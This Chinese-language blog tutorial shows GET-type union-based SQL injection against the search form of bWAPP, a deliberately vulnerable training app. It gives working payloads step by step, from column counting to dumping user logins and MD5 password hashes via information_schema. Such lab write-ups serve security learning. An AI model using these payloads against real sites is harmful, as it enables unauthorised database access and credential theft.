SQL注入之GET型（search）

Posted 2023-03-10

参考技术A

我们进行测试这里是否存在SQL注入漏洞

输入a\'

点击搜索后

报错了，说明很大可能存在SQL注入漏洞了。

order by 语句

输入 a\' order by 1 #

输入a\' order by 7#

输入a\' order by 8#

由此可以判断出，库中有7个列。

使用联合查询注入union

输入a\' union select 1,2,3,4,5,6,7#

可以看出是从2开始显示。

可以将2,3,5,4,替换成我们想要查询的信息

system_user() 系统用户名

user() 用户名

current_user 当前用户名

session_user() 连接数据库的用户名

database() 数据库名

version() mysql数据库版本

load_file() MYSQL读取本地文件的函数

@@datadir 读取数据库路径

@@basedir MYSQL 安装路径

@@version_compile_os 操作系统

输入a\' union select 1,database(),3,4,5,6,7#

可见当前数据库为bwapp

输入a\' union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database()#

当前数据库（bwapp）中，有五张表，其中users比较重要。

先查看users表的所有的列的信息

输入a\' union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name=\'users\'#

一共有9列。

其中的login和password，应该是我们有我们想要的东西。

那我们就去查出它们的信息

输入a\' union select 1,login,password,4,5,6,7 from users#

获取login信息和password密码

其中密码是经过md5加密，我们需要去解密